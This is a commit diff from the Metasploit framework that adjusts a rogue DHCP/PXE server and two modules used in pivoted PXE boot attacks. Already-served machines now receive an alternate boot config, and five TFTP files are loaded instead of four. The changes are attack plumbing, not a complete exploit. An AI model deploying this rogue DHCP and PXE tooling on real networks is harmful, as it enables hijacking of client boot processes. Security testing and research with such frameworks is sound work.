Fixes #5312 for pivoted PXE attacks.
git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
53e43fa847
commit
06c3dabe31
Binary file not shown.
Binary file not shown.
|
@ -222,6 +222,9 @@ int DHCPserv::run(){
|
||||||
string pxeConfigFile("update2");
|
string pxeConfigFile("update2");
|
||||||
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
||||||
|
|
||||||
|
string pxeAltConfigFile("update0");
|
||||||
|
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
|
||||||
|
|
||||||
string pxePathPrefix("");
|
string pxePathPrefix("");
|
||||||
//get DHCP parameters
|
//get DHCP parameters
|
||||||
unsigned int leaseTime = 600;
|
unsigned int leaseTime = 600;
|
||||||
|
@ -336,10 +339,6 @@ int DHCPserv::run(){
|
||||||
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
||||||
pkt << DHCPOffer;
|
pkt << DHCPOffer;
|
||||||
|
|
||||||
// check if already served based on hw addr (MAC address)
|
|
||||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
|
||||||
continue; //Already served; allowing normal boot
|
|
||||||
|
|
||||||
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
||||||
pkt << DHCPAck;
|
pkt << DHCPAck;
|
||||||
|
|
||||||
|
@ -360,7 +359,12 @@ int DHCPserv::run(){
|
||||||
pkt << dhcpoption(OpDns, iton(dnsServer));
|
pkt << dhcpoption(OpDns, iton(dnsServer));
|
||||||
string pxemagic(PXEMagic,4);
|
string pxemagic(PXEMagic,4);
|
||||||
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
||||||
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
|
||||||
|
// check if already served based on hw addr (MAC address)
|
||||||
|
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||||
|
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
|
||||||
|
else
|
||||||
|
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
||||||
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
||||||
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
||||||
if ( hostname.length() > 0 ){
|
if ( hostname.length() > 0 ){
|
||||||
|
|
|
@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Loading DHCP options...")
|
print_status("Loading DHCP options...")
|
||||||
client.lanattacks.load_dhcp_options(datastore)
|
client.lanattacks.load_dhcp_options(datastore)
|
||||||
1.upto(4) do |i|
|
0.upto(4) do |i|
|
||||||
print_status("Loading file #{i} of 4")
|
print_status("Loading file #{i+1} of 5")
|
||||||
if i < 4
|
if i < 4
|
||||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||||
else
|
else
|
||||||
|
|
|
@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
|
||||||
print_status("Loading DHCP options...")
|
print_status("Loading DHCP options...")
|
||||||
client.lanattacks.load_dhcp_options(datastore)
|
client.lanattacks.load_dhcp_options(datastore)
|
||||||
|
|
||||||
1.upto(4) do |i|
|
0.upto(4) do |i|
|
||||||
print_status("Loading file #{i} of 4")
|
print_status("Loading file #{i+1} of 5")
|
||||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||||
client.lanattacks.add_tftp_file("update#{i}",contents)
|
client.lanattacks.add_tftp_file("update#{i}",contents)
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue